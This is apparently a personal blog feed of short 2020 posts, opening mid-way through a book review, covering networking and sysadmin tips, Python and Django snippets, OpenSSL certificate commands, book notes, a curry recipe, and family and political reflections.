The impact a person of authority has over a child becomes strikingly apparent in the book Educated, a memoir from Tara Westover. She recounts the decades of physical and mental abuse her parents and siblings unleashed while growing up in rural Idaho. This story illustrates the important role education and diverse life experiences bestow in shaping the belief systems we carry with us throughout our lives.

The book begins with young Tara living under an oppressive father, whose twisted beliefs are scored by survivalism, distrust of the government, and an unwavering belief in the Morman church. Their father rules over the family by filling their minds with endless delusions depicting the end of days, a corrupt socialist government, and distrust of outsiders. He fills their days, performing the Lord’s edict by requiring everyone to prepare for a forthcoming apocalypse.

Week in Review: Issue #1

Fri, 04 Dec 2020 12:40:38 -0600

Welcome to the first installment of the Week in Review. A weekly posting of news articles I found interesting.

https://arstechnica.com/gadgets/2020/12/iphone-zero-click-wi-fi-exploit-is-one-of-the-most-breathtaking-hacks-ever/ - Apple patched one of the most breathtaking iPhone vulnerabilities ever: a memory corruption bug in the iOS kernel that gave attackers remote access to the entire device—over Wi-Fi, with no user interaction required at all.
https://www.bbc.com/news/health-55145696 - Pfizer/BioNTech vaccine judged safe for use in UK from next week. Britain’s medicines regulator, the MHRA, says the jab, which offers up to 95% protection against Covid-19 illness, is safe to be rolled out. The first doses are already on their way to the UK, with 800,000 due in the coming days, Pfizer said.
https://www.theguardian.com/environment/2020/dec/02/no-kill-lab-grown-meat-to-go-on-sale-for-first-time - Cultured meat, produced in bioreactors without the slaughter of an animal, has been approved for sale by a regulatory authority for the first time. The development has been hailed as a landmark moment across the meat industry. The “chicken bites”, produced by the US company Eat Just, have passed a safety review by the Singapore Food Agency and the approval could open the door to a future when all meat is produced without the killing of livestock, the company said.
https://holidayhackchallenge.com/2020/index.html - The KringleCon 3 CTF event begins the second week of December 2020.
https://investor.salesforce.com/press-releases/press-release-details/2020/Salesforce-Signs-Definitive-Agreement-to-Acquire-Slack/default.aspx - Salesforce to acquire slack for $27.7 billion.

Removing an IP address from a network interface in macOS

Thu, 03 Dec 2020 09:06:31 -0600

TL;DR

Remove an IP address from an interface in macOS:

jemurray@mbp-2019:~ $ sudo ifconfig en0 delete 172.20.10.4
Password:

Details

A network interface can contain multiple IP address:

jemurray@mbp-2019:~ $ ifconfig en0
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        options=400<CHANNEL_IO>
        ether f0:18:98:9b:b5:b2
        inet6 fe80::1cd4:4e32:efbe:c0b9%en0 prefixlen 64 secured scopeid 0x6
        inet6 2600:380:643d:1845:fd:56c8:ea95:642d prefixlen 64 autoconf secured
        inet6 2600:380:643d:1845:2c19:1a54:5f49:b13e prefixlen 64 autoconf temporary
        inet 172.20.10.4 netmask 0xfffffff0 broadcast 172.20.10.15
        nd6 options=201<PERFORMNUD,DAD>
        media: autoselect
        status: active

To remove a single IP, us the ifconfig command with the delete option:

KringleCon 3 Coming Soon

Wed, 02 Dec 2020 15:08:50 -0600

SANS is hosting KringleCon 3, the annual Holiday Hacking Contest attended by the best security experts around the world. KringleCon is an online capture the flag (CTF) style event where players solve various security related challenges.

Last year players were presented with 10 different objectives of varying levels of difficulty. In addition, each objective had a corresponding training module to help the user become familiar with the concepts and tools necessary to solve the task. Some of these training modules were created by high profile experts in their fields. It was a fantastic learning opportunity.

Locating ethernet ports with ethtool

Tue, 01 Dec 2020 06:24:01 -0600

TL;DR

Use ethtool to locate a physical network port by blinking the lights:

sudo ethtool --identify eth0

Details

On systems with multiple physical network adaptors, it is not always obvious which physical port belongs to the software interface. For example, the following desktop has multiple network interfaces:

jemurray@desktop:~$ ifconfig -a
eth0      Link encap:Ethernet  HWaddr 78:e3:b5:06:91:18
          inet addr:192.168.86.123  Bcast:192.168.86.255  Mask:255.255.255.0
          inet6 addr: fe80::7ae3:b5ff:fe06:9118/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:9613 errors:0 dropped:172 overruns:0 frame:0
          TX packets:1256 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:798122 (798.1 KB)  TX bytes:338757 (338.7 KB)
          Interrupt:95

eth1      Link encap:Ethernet  HWaddr 78:e3:b5:06:91:19
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
          Interrupt:99

eth2      Link encap:Ethernet  HWaddr 78:e3:b5:06:91:1a
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
          Interrupt:103

eth3      Link encap:Ethernet  HWaddr 78:e3:b5:06:91:1b
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
          Interrupt:107

The ethtool command has an --identify option that blinks the lights on a physical network interface.

Accessing the HP DL370 G6 hardware RAID menu on boot

Mon, 30 Nov 2020 15:46:17 -0600

To access the hidden RAID menu on the HP DL 370 G6, keep pressing the F8 key during the boot process:

Rant

Dear server manufactures,

Please make it easier to find boot menu key sequences. For those of us who access these menus on rare occasions, fumbling around a clumsy interface is something we rather avoid. Often these menus are required during an emergency event, hardware maintenance, or in my case to determine if my systems was about to deteriorate beyond repair after a disk replacement.

Dump ASCII table in Python

Sun, 29 Nov 2020 19:57:19 -0600

Python script to dump the ASCII table:

#!/usr/bin/env python3

print("|{:^9}|{:^10}|{:^10}|".format("ASCII", "Decimal", "Hex"))
for c in range(256):
    print("|{:^10}|{:^10}|{:^10}|".format(str(chr(c)), c, hex(c)))

Output:

|  ASCII  | Decimal  |   Hex    |
|         |    0     |   0x0    |
|         |    1     |   0x1    |
|         |    2     |   0x2    |
|         |    3     |   0x3    |
|         |    4     |   0x4    |
|         |    5     |   0x5    |
|         |    6     |   0x6    |
|         |    7     |   0x7    |
|         |    8     |   0x8    |
|    	    |    9     |   0x9    |
|         |    10    |   0xa    |
|         |    11    |   0xb    |
|         |    12    |   0xc    |
|         |    13    |   0xd    |
|         |    14    |   0│␊    |
|         |    15    |   0xf    |
|         |    16    |   0x10   |
|         |    17    |   0x11   |
|         |    18    |   0x12   |
|         |    19    |   0x13   |
|         |    20    |   0x14   |
|         |    21    |   0x15   |
|         |    22    |   0x16   |
|         |    23    |   0x17   |
|         |    24    |   0x18   |
|         |    25    |   0x19   |
|         |    26    |   0x1a   |
|         |    27    |   0x1b   |
|         |    28    |   0x1c   |
|         |    29    |   0x1d   |
|         |    30    |   0x1e   |
|         |    31    |   0x1f   |
|          |    32    |   0x20   |
|    !     |    33    |   0x21   |
|    "     |    34    |   0x22   |
|    #     |    35    |   0x23   |
|    $     |    36    |   0x24   |
|    %     |    37    |   0x25   |
|    &     |    38    |   0x26   |
|    '     |    39    |   0x27   |
|    (     |    40    |   0x28   |
|    )     |    41    |   0x29   |
|    *     |    42    |   0x2a   |
|    +     |    43    |   0x2b   |
|    ,     |    44    |   0x2c   |
|    -     |    45    |   0x2d   |
|    .     |    46    |   0x2e   |
|    /     |    47    |   0x2f   |
|    0     |    48    |   0x30   |
|    1     |    49    |   0x31   |
|    2     |    50    |   0x32   |
|    3     |    51    |   0x33   |
|    4     |    52    |   0x34   |
|    5     |    53    |   0x35   |
|    6     |    54    |   0x36   |
|    7     |    55    |   0x37   |
|    8     |    56    |   0x38   |
|    9     |    57    |   0x39   |
|    :     |    58    |   0x3a   |
|    ;     |    59    |   0x3b   |
|    <     |    60    |   0x3c   |
|    =     |    61    |   0x3d   |
|    >     |    62    |   0x3e   |
|    ?     |    63    |   0x3f   |
|    @     |    64    |   0x40   |
|    A     |    65    |   0x41   |
|    B     |    66    |   0x42   |
|    C     |    67    |   0x43   |
|    D     |    68    |   0x44   |
|    E     |    69    |   0x45   |
|    F     |    70    |   0x46   |
|    G     |    71    |   0x47   |
|    H     |    72    |   0x48   |
|    I     |    73    |   0x49   |
|    J     |    74    |   0x4a   |
|    K     |    75    |   0x4b   |
|    L     |    76    |   0x4c   |
|    M     |    77    |   0x4d   |
|    N     |    78    |   0x4e   |
|    O     |    79    |   0x4f   |
|    P     |    80    |   0x50   |
|    Q     |    81    |   0x51   |
|    R     |    82    |   0x52   |
|    S     |    83    |   0x53   |
|    T     |    84    |   0x54   |
|    U     |    85    |   0x55   |
|    V     |    86    |   0x56   |
|    W     |    87    |   0x57   |
|    X     |    88    |   0x58   |
|    Y     |    89    |   0x59   |
|    Z     |    90    |   0x5a   |
|    [     |    91    |   0x5b   |
|    \     |    92    |   0x5c   |
|    ]     |    93    |   0x5d   |
|    ^     |    94    |   0x5e   |
|    _     |    95    |   0x5f   |
|    `     |    96    |   0x60   |
|    a     |    97    |   0x61   |
|    b     |    98    |   0x62   |
|    c     |    99    |   0x63   |
|    d     |   100    |   0x64   |
|    e     |   101    |   0x65   |
|    f     |   102    |   0x66   |
|    g     |   103    |   0x67   |
|    h     |   104    |   0x68   |
|    i     |   105    |   0x69   |
|    j     |   106    |   0x6a   |
|    k     |   107    |   0x6b   |
|    l     |   108    |   0x6c   |
|    m     |   109    |   0x6d   |
|    n     |   110    |   0x6e   |
|    o     |   111    |   0x6f   |
|    p     |   112    |   0x70   |
|    q     |   113    |   0x71   |
|    r     |   114    |   0x72   |
|    s     |   115    |   0x73   |
|    t     |   116    |   0x74   |
|    u     |   117    |   0x75   |
|    v     |   118    |   0x76   |
|    w     |   119    |   0x77   |
|    x     |   120    |   0x78   |
|    y     |   121    |   0x79   |
|    z     |   122    |   0x7a   |
|    {     |   123    |   0x7b   |
|    |     |   124    |   0x7c   |
|    }     |   125    |   0x7d   |
|    ~     |   126    |   0x7e   |
|          |   127    |   0x7f   |
|         |   128    |   0x80   |
|         |   129    |   0x81   |
|         |   130    |   0x82   |
|         |   131    |   0x83   |
|         |   132    |   0x84   |
|         |   133    |   0x85   |
|        |   134    |   0x86   |
|        |   135    |   0x87   |
|        |   136    |   0x88   |
|        |   137    |   0x89   |
|        |   138    |   0x8a   |
|          |   139    |   0x8b   |
|        |   140    |   0x8c   |
|        |   141    |   0x8d   |
|        |   142    |   0x8e   |
|        |   143    |   0x8f   |
|        |   144    |   0x90   |
|        |   145    |   0x91   |
|        |   146    |   0x92   |
|        |   147    |   0x93   |
|        |   148    |   0x94   |
|        |   149    |   0x95   |
|        |   150    |   0x96   |
|        |   151    |   0x97   |
|        |   152    |   0x98   |
|        |   153    |   0x99   |
|        |   154    |   0x9a   |
|        |   155    |   0x9b   |
|        |   156    |   0x9c   |
|        |   157    |   0x9d   |
|        |   158    |   0x9e   |
|        |   159    |   0x9f   |
|          |   160    |   0xa0   |
|    ¡     |   161    |   0xa1   |
|    ¢     |   162    |   0xa2   |
|    £     |   163    |   0xa3   |
|    ¤     |   164    |   0xa4   |
|    ¥     |   165    |   0xa5   |
|    ¦     |   166    |   0xa6   |
|    §     |   167    |   0xa7   |
|    ¨     |   168    |   0xa8   |
|    ©     |   169    |   0xa9   |
|    ª     |   170    |   0xaa   |
|    «     |   171    |   0xab   |
|    ¬     |   172    |   0xac   |
|          |   173    |   0xad   |
|    ®     |   174    |   0xae   |
|    ¯     |   175    |   0xaf   |
|    °     |   176    |   0xb0   |
|    ±     |   177    |   0xb1   |
|    ²     |   178    |   0xb2   |
|    ³     |   179    |   0xb3   |
|    ´     |   180    |   0xb4   |
|    µ     |   181    |   0xb5   |
|    ¶     |   182    |   0xb6   |
|    ·     |   183    |   0xb7   |
|    ¸     |   184    |   0xb8   |
|    ¹     |   185    |   0xb9   |
|    º     |   186    |   0xba   |
|    »     |   187    |   0xbb   |
|    ¼     |   188    |   0xbc   |
|    ½     |   189    |   0xbd   |
|    ¾     |   190    |   0xbe   |
|    ¿     |   191    |   0xbf   |
|    À     |   192    |   0xc0   |
|    Á     |   193    |   0xc1   |
|    Â     |   194    |   0xc2   |
|    Ã     |   195    |   0xc3   |
|    Ä     |   196    |   0xc4   |
|    Å     |   197    |   0xc5   |
|    Æ     |   198    |   0xc6   |
|    Ç     |   199    |   0xc7   |
|    È     |   200    |   0xc8   |
|    É     |   201    |   0xc9   |
|    Ê     |   202    |   0xca   |
|    Ë     |   203    |   0xcb   |
|    Ì     |   204    |   0xcc   |
|    Í     |   205    |   0xcd   |
|    Î     |   206    |   0xce   |
|    Ï     |   207    |   0xcf   |
|    Ð     |   208    |   0xd0   |
|    Ñ     |   209    |   0xd1   |
|    Ò     |   210    |   0xd2   |
|    Ó     |   211    |   0xd3   |
|    Ô     |   212    |   0xd4   |
|    Õ     |   213    |   0xd5   |
|    Ö     |   214    |   0xd6   |
|    ×     |   215    |   0xd7   |
|    Ø     |   216    |   0xd8   |
|    Ù     |   217    |   0xd9   |
|    Ú     |   218    |   0xda   |
|    Û     |   219    |   0xdb   |
|    Ü     |   220    |   0xdc   |
|    Ý     |   221    |   0xdd   |
|    Þ     |   222    |   0xde   |
|    ß     |   223    |   0xdf   |
|    à     |   224    |   0xe0   |
|    á     |   225    |   0xe1   |
|    â     |   226    |   0xe2   |
|    ã     |   227    |   0xe3   |
|    ä     |   228    |   0xe4   |
|    å     |   229    |   0xe5   |
|    æ     |   230    |   0xe6   |
|    ç     |   231    |   0xe7   |
|    è     |   232    |   0xe8   |
|    é     |   233    |   0xe9   |
|    ê     |   234    |   0xea   |
|    ë     |   235    |   0xeb   |
|    ì     |   236    |   0xec   |
|    í     |   237    |   0xed   |
|    î     |   238    |   0xee   |
|    ï     |   239    |   0xef   |
|    ð     |   240    |   0xf0   |
|    ñ     |   241    |   0xf1   |
|    ò     |   242    |   0xf2   |
|    ó     |   243    |   0xf3   |
|    ô     |   244    |   0xf4   |
|    õ     |   245    |   0xf5   |
|    ö     |   246    |   0xf6   |
|    ÷     |   247    |   0xf7   |
|    ø     |   248    |   0xf8   |
|    ù     |   249    |   0xf9   |
|    ú     |   250    |   0xfa   |
|    û     |   251    |   0xfb   |
|    ü     |   252    |   0xfc   |
|    ý     |   253    |   0xfd   |
|    þ     |   254    |   0xfe   |
|    ÿ     |   255    |   0xff   |

Book notes: Outliers

Sat, 28 Nov 2020 10:52:34 -0600

Summary

It is a common belief, the most successful people rise to the top because of their own hard work, grit, and determination. While this is true to a degree, Malcom Gladwell details in his book Outliers, there is much more to their stories then individual determination. By digging deeper into each success story, patterns of opportunity begin to emerge. These subtle advantages help to propel the lucky few in ways others, with equivalent ability, are not. Gladwell discusses in detail on the affects of long hours of practice, family culture, access to resources, and birth year to explain why certain people accomplish great feats while others do not.

Debugging Python code with vscode

Fri, 27 Nov 2020 10:30:32 -0600

Overview

Replace the traditional print("DEBUG: " + str(variable)) with vscode breakpoints and variable inspection.

Details

Basic Debugging

Start with a Python script by running it in the built in terminal (click the play button in the upper right corner):

To enable debugging, click the Run and Debug button in the left side bar:

Click Run and Debug:

Select Python file:

Set a break point by clicking the space directly to the left of the line number in the Python code. A small red dot is added at every break point:

Being grateful on Thanksgiving

Thu, 26 Nov 2020 14:41:25 -0600

As we spend time with our family and social distance with our friends this Thanksgiving, take the time to remember what we are thankful for.

I am grateful for:

My family. They are the reason I get out of bed every day. I love you all!
My wife. She is the love of my life, companion, and personal life coach. You helped me become the person I am today, and I thank you for it.
My kids. Curious, empathetic, and intelligent. You make me proud!
My parents. I would not be here without your guidance, encouragement, and mentoring. Without you there is no me.
My health. I am grateful for this every day.
My job. Hard work allowed me to do what I love, the pay check allows me to pursue my dreams.
My friends. You helped to shape who I am. Surround yourself by exceptional people, together we will conquer the world.
My house. I like to be warm and dry.
My country. I am privileged to live in a country where I am free to pursue what makes me happy.
Healthcare. There are very few services more important then good health care. Thank you to the health care professionals! Especially, during this COVID19 pandemic!
Education. We owe our teaches a lot of gratitude. Their 80 hour weeks produce the next generation of leaders.
Technology. I am in awe every day. From simple machines, to libraries of information in my pocket.

Look for the positive, don’t get lost in the negative. The world is getting better everyday. Find your joy, hug your family, and enjoy life to the fullest.

Microsoft patch Tuesday impact on university network edge links

Wed, 25 Nov 2020 15:09:27 -0600

The second Tuesday of every month Microsoft releases patch bundles for its software product line. Depending on the size of the organization, this may have significant impact on the Internet and networking infrastructure.

Washington University in St. Louis has 3 x 10G and 1 x 20G links to the commodity and research Internet through Cogent, Lumen, Spectrum, and Internet2. In November of 2020, the patch cycle hit the Internet links pretty hard.

Twenty years of history from old drives in the basement

Tue, 24 Nov 2020 11:05:10 -0600

A few days ago I was looking into using the WayBack Machine to retrieve content from my old websites in order to consolidate posts in one location. However, the WayBack machine was missing content and I had lost track of backups that may contain these old files.

I suspected this pile of drives in the basement may have the information I was looking for:

However, I don’t have hardware with SCSI, IDE, and SATA interfaces. Google and Amazon to the rescue, 2 days later this arrived:

Searching websites that don't have a native search function

Mon, 23 Nov 2020 08:30:09 -0600

Statically generated websites, like this one, don’t rely on server side processing. This makes it more difficult to include a native search function. I know there are tools to enable search, but the entire point of building this site with a static generator is to keep it simple. I don’t want deal with maintaining additional software or building non-native libraries.

Fortunately, there is an easy alternative. The big search engines, Google and Duck Duck Go have the site: search filter.

Reattaching tmux sessions from smaller client

Sun, 22 Nov 2020 06:48:18 -0600

I regularly use mosh and tmux on a phone, iPad, and laptop. Since mosh does not disconnect sessions, attaching tmux on both screens at the same time will result in a session on the larger screen that looks like this:

When reattaching the session on the larger screen, use the -d option to disconnect all other sessions first:

tmux attach -d

Django Quick Start

Sat, 21 Nov 2020 16:56:15 -0600

Overview

Django is a high-level Python web development framework. To put it simply, it eliminates the complexity of building a Python enable website.

Details

Create a directory for the Django project:

Caution: Don’t use django as the directory name.

mkdir dproject
cd dproject

Setup a Python virtual environment:

python -m venv .venv

Activate virtual env:

source .venv/bin/activate

Install Django:

pip install django

Create a new Django project:

django-admin startproject mysite

Start development server:

cd mysite
python manage.py runserver

Test the development server is operating properly:

Using the WayBack Machine to reconstruct my old websites

Fri, 20 Nov 2020 19:08:10 -0600

The first website I created was hosted at: cris.com/~jemurray, last archived on Nov 11, 1999. Unfortunately, there is no saved copies of the content.

Shortly after, whois says I registered my first personal domain zweck.net in April 2000:

   Domain Name: ZWECK.NET
   Updated Date: 2020-03-06T20:32:08Z
   Creation Date: 2000-04-09T20:29:01Z

The WayBack Machine archived many version of my websites starting on Aug 18, 2000. Unfortunately, it is not complete. I am hoping the pile of old hard drives in my basement and this USB to IDE and SATA adaptor will find the missing pages (and possibly that bitcoin wallet that still alludes me).

Persistent SSH tunnel with autossh

Thu, 19 Nov 2020 15:51:41 -0600

Overview

To access websites behind an internal network, I proxy web traffic to specific DNS domains over an ssh connection using the SOCKS protocol. The SwitchyOmega plugin takes care of site specific proxying and autossh securely forwards all SOCKS traffic through the ssh tunnel.

To handle network instability, VPN connectivity, and laptop mobility, autossh automatically restarts the ssh tunnel during network changes or failures.

Details

Prerequisite

ssh key authentication must be setup prior to using autossh. The ssh session can not prompt for a password.

Avoid accidental pasting with iTerm2

Wed, 18 Nov 2020 15:47:44 -0600

iTerm2 has a feature called “Advanced Paste…”. This feature allows the user to review and modify the copy-and-paste buffer before the paste takes place.

For example, the command ./therightcommand.sh is entered in one terminal window and needs to be pasted into another. The text is selected and control+v is pressed to copy the text.

Then option+command+c is pressed to enter the Advanced Paste... mode. Whoops, ctrl+c was accidentally pressed above, which is the wrong copy command. This mistake is easily caught with advanced pasted in iTerm:

MacBook Pro won't stay in sleep mode when the lid is closed

Tue, 17 Nov 2020 16:21:03 -0600

My macOS 10.15.x laptop no longer stays sleeping when I close the lid. After a few hours in my backpack the laptop will be hot and the battery almost dead. To remedy the issue, check the following settings.

Disable Allow Bluetooth Devices to wake this computer:

Disable Power Nap:

It's all about you

Mon, 16 Nov 2020 08:04:24 -0600

I believe we all need to put a little more emphasis on our neighbor and a little less emphasis on “me”.

The 2020 election continues to reaffirm the United States is a divided country. Three percent separates the Republicans from the Democrats in the presidential election. Nearly a 50/50 divide of the American people. What I see coming out of these election cycles, and with politics in general, is the country’s inability to discuss the most important issues in a reasonable forum. You are either on team A or team B, there is no in-between. Someone willing to listen or work with the other side is portrayed as weak or a traitor. This is where I believe we need to put a little more emphasis on our neighbor and a little less emphasis on “me”.

Deer rubs

Sun, 15 Nov 2020 16:19:34 -0600

Antlers

Why do deer rub the bark off trees? Before we answer that question, we need a brief introduction to antlers. Male deer shed and grow a new set of antlers every year. Each year growing a fresh set typically larger then the previous. The cycle begins in the late spring. Throughout the growing stage, the antlers are rich in blood and covered in a hair like material commonly known as velvet. During this period the antlers are susceptible to damage such as cuts and bruises, similar to their skin. Late in the summer, the growth cycles stops and the antlers start to mineralize or harden. The fleshly velvet dries into a fluffy fuzz. If left alone, this new fuzz would fall off on its own.

Hunting in the rain, or the lack there of...

Sat, 14 Nov 2020 16:19:34 -0600

For the first time in over a decade, I did not hunt from a tree stand on the opening day of firearms deer season. Why, you ask? Do I have COVID, am I sick, is someone in my family in need of attention? Nope, it was raining. The weather does not always cooperate. It is not uncommon to experience sideways rain, sleet, blizzards, sub-zero temperatures, and even extreme heat. I have endured my fair share. Not this year however.

tmux basics

Fri, 13 Nov 2020 15:48:06 -0600

Overview

tmux is a terminal multiplexer. It lets you switch between several programs in one terminal session, detach them (while everything is still running in the background) and reattach them to a different terminal. If you use the console command line, especially from remote, this is a must have tool.

Start tmux, run a long command, detach and come back days later, it will still be there (this alone is enough reason to use tmux):

Google WiFi drops DNS queries that return a RFC1918 answer

Thu, 12 Nov 2020 14:30:58 -0600

Overview

Google WiFi routers don’t allow DNS queries that return RFC1918 answers in the response:

jemurray@mbp-2019:~ $ dig @192.168.86.1 home-server.jasonmurray.org

; <<>> DiG 9.10.6 <<>> @192.168.86.1 home-server.jasonmurray.org
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 33369
;; flags: qr; QUERY: 0, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; Query time: 65 msec
;; SERVER: 192.168.86.1#53(192.168.86.1)
;; WHEN: Thu Nov 12 14:43:25 CST 2020
;; MSG SIZE  rcvd: 12

These queries are blocked to mitigate potential DNS rebinding attacks.

Install CentOS 8 (latest) with Docker

Wed, 11 Nov 2020 16:20:50 -0600

Overview

I have a few production RedHat 8 servers, but no lab. Before implementing a new configuration change on the production servers, validating correctness in the lab is a prudent idea. In a previous life, I would download the ISO images, install, and test.

11 Minutes! Who has time for that? Not to mention the 10+ minutes it will take to do the installation.

Enter Docker, the virtual machine containerizing system.

Determine the active OpenDNS anycast server

Tue, 10 Nov 2020 15:37:22 -0600

In anycast, a single IP address can be configured on many servers. Anycast is used to deploy highly available and geographically redundant services. For example, OpenDNS uses an anycast network to deploy DNS servers all over the world. Routing “tricks” takes care of sending traffic to the closest geographic server.

If servers are deployed around the world and use the same address, how can we determine which server is processing the requests? A diagnostic mechanism must be built into the application. In the case of OpenDNS, a TXT DNS query is made to debug.opendns.com, which returns the location and various other debugging information.

State vs. county vote

Mon, 09 Nov 2020 06:53:28 -0600

In the United States the electorial college, not the popular vote, determines which candidate wins the presidential election. Since 1869 the United States has been a two party system of either Republican (red) or Democrat (blue). This distinction results in an election map that looks like this:

While the 2020 presidential election popular vote was split almost down the middle (as of November 7, 2020):

Donald Trump: 70,598,535 - 47.7%
Joe Biden: 74,857,880 - 50.6%

I believe maps like the one above, are slightly misleading. They don’t tell the full story of the states voting behavior. The entire state did not vote for one candidate or the other. Take Colorado for example, in 2020 the electoral college votes went for a Democrat. However, drill into the map below and you see almost equal sized dots of red and blue.

Red curry, rice, and vegetables

Sun, 08 Nov 2020 14:36:53 -0600

Overview

Here is a quick and simple rice, vegetable, and curry recipe. Most ingredients are easily sourced. The total cook time is around 15 minutes.

Ingredients

2 cups rice
1 bag of frozen mixed vegetables
1/2 tablespoon sesame oil
1/2 tablespoon olive oil
Pinch of salt, more to taste
2 cloves garlic, pressed or minced
3 tablespoons Thai red curry paste (Thai Kitchen Red Curry Paste)
1 can (14 ounces) regular coconut milk
1/2 cup water
1 1/2 teaspoons sugar
1 tablespoon soy sauce
2 teaspoons lime juice

Instructions

Rice

Cook rice per directions on package.

Vegetables

Cook frozen vegetables per directions on package.

Curry

Heat large skillet with 1/2 tbs sesame and 1/2 tbs olive oil
Add pinch of salt to taste
Brown 2 cloves garlic
Add 3 tbs Thai Red Curry paste
Add 1 can regular coconut milk (stir often)
Add 1/2 cup water
Add 1 1/2 tsp sugar
Add 1 tbs soy sauce
Add 2 tsp lime juice
Simmer over medium heat for 5 to 10 minutes

Mix

Mix Rice, vegetables, and curry together and serve.

Using OpenSSL to create and validate self-signed certificate in one command

Sat, 07 Nov 2020 15:00:51 -0600

Single command with all options and no password (fully automated)

Command:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes -subj "/C=US/ST=Missouuri/L=St. Louuis/O=Company Name/OU=Org/CN=www.example.com"

Full output:

jemurray@mbp-2019:~/test $ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes -subj "/C=US/ST=Missouuri/L=St. Louuis/O=Company Name/OU=Org/CN=www.example.com"
Generating a 4096 bit RSA private key
...................................................++
...................................++
writing new private key to 'key.pem'
-----

Single command with password and manual information entry

Command:

Switching from EverNote to Notion?

Fri, 06 Nov 2020 16:01:20 -0600

I’ve spent the past 10 years on Evernote. Handwriting recognition and a clean interface kept me renewing my subscription year after year. This past year the mobile interface is not as snappy as it once was. It takes seconds to start a new note. With a few months left before the annual renewal, I thought it was time to evaluate something different.

Enter Notion. Right out of the gate, importing EverNote and all my MarkDown files was a painless process:

Installing iperf3 on a Cisco 9K

Thu, 05 Nov 2020 08:13:12 -0500

Overview

Running a custom built iperf3 Docker image on the Cisco Catalyst 9300 series platform.

Reference guide: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/prog/configuration/171/b_171_programmability_cg/application_hosting.html

Create the Docker image

Create the Dockerfile:

FROM alpine:latest

MAINTAINER Jason Murray

# build intial apk binary cache and install iperf3
RUN apk add --no-cache iperf3 \
    && adduser -S iperf

USER iperf

# Expose the default iperf3 server ports
EXPOSE 5201/tcp 5201/udp

# entrypoint allows you to pass your arguments to the container at runtime
# very similar to a binary you would run. For example, in the following
# docker run -it <IMAGE> --help' is like running 'iperf --help'
ENTRYPOINT ["iperf3"]

# iperf3 -s = run in Server mode
CMD ["-s"]

Create the Docker image:

Setting up an OpenSSH bastion host for an entire DNS domain

Wed, 04 Nov 2020 16:36:19 -0600

Overview

Remote administration via ssh is a standard practice for many unix based servers or networking devices. Protecting this critical infrastructure by provisioning internal devices on RFC1918 IP space and/or limiting inbound connections to specific bastion or jump-hosts is a common method to limit external exposure.

Bastion hosts are security hardened devices who’s sole purpose is to act as a gateway into the production environment. These servers should be stripped down to essential services and patched on a regular basis. The server typically sits between the untrusted and trusted network, as shown in the diagram below:

Cisco aaa authorization exec needed to transfer files

Tue, 03 Nov 2020 15:08:48 -0500

Error:

jemurray@mbp-2019:~/Downloads $ scp -c aes128-cbc c3560c405-universalk9-mz.152-2.E10.bin 192.168.86.42:
Password:
Privilege denied.
jemurray@mbp-2019:~/Downloads $ client_loop: send disconnect: Broken pipe

Fix:

aaa authorization exec default local

Try again:

jemurray@mbp-2019:~/Downloads $ scp -c aes128-cbc c3560c405-universalk9-mz.152-2.E10.bin 192.168.86.42:c3560c405-universalk9-mz.152-2.E10.bin
Password:
c3560c405-universalk9-mz.152-2.E10.bin     3%  624KB  58.0KB/s   05:23 ETA

Disney World Family Vacation Day Eight

Mon, 02 Nov 2020 18:43:03 -0600

The Murray’s are boarding a bus to the airport. Time to fly home.

Disney World Family Vacation Day Seven

Sun, 01 Nov 2020 18:43:03 -0600

The final day of the Murray family vacation is spent at Hollywood studios.

Disney World Family Vacation Day Six

Sat, 31 Oct 2020 18:43:03 -0600

Happy Halloween! The Murray’s are back to Magic Kingdom. The kids tell me the sun is too bright.

Disney World Family Vacation Day Five

Fri, 30 Oct 2020 18:43:03 -0600

Animal Kingdom on day five of the Murray family vacation.

Disney World Family Vacation Day Four

Thu, 29 Oct 2020 18:43:03 -0600

Hollywood Studios is where the Murray’s spend day four of their family vacation. (pew pew)

We did get tickets to Star Wars: Rise of the Resistance.

The attention to detail is incredible:

Disney World Family Vacation Day Three

Wed, 28 Oct 2020 18:43:03 -0600

The Murray family is at Epcot for day three of our week long vacation.

Disney World Family Vacation Day Two

Tue, 27 Oct 2020 18:43:03 -0600

Day two of the Murray family vacation begins at Disney’s Magic Kingdom.

Disney World Family Vacation Day One

Mon, 26 Oct 2020 18:43:03 -0600

The family vacation begins. Waiting to board our plane to Disney World.

A break

Mon, 26 Oct 2020 09:04:30 -0500

On April 17, 2020 I set a goal to create one post per day for no less than one year. What a year it has been. Corona virus is still going strong. Donald Trump is unfortunately still president. My wife’s cancer returned. Both my kids are in high school. It has been a wild ride. To be fair, my family is still doing well. The COVID-19 pandemic has not impacted our lives in a way that we can’t handle. For that we are blessed.

Enable scp copies TO a Cisco device

Sun, 25 Oct 2020 08:02:23 -0500

Overview

The scp server is disabled by default on Cisco switches and routers. Enable scp to push files to the device.

Details

Error:

jemurray@mbp-2019:~/Downloads $ scp -c aes128-cbc c3560c405-universalk9-mz.152-2.E10.bin 192.168.86.42:c3560c405-universalk9-mz.152-2.E10.bin
Password:
Administratively disabled.
jemurray@mbp-2019:~/Downloads $ client_loop: send disconnect: Broken pipe

Fix:

ip scp server enable

Try again:

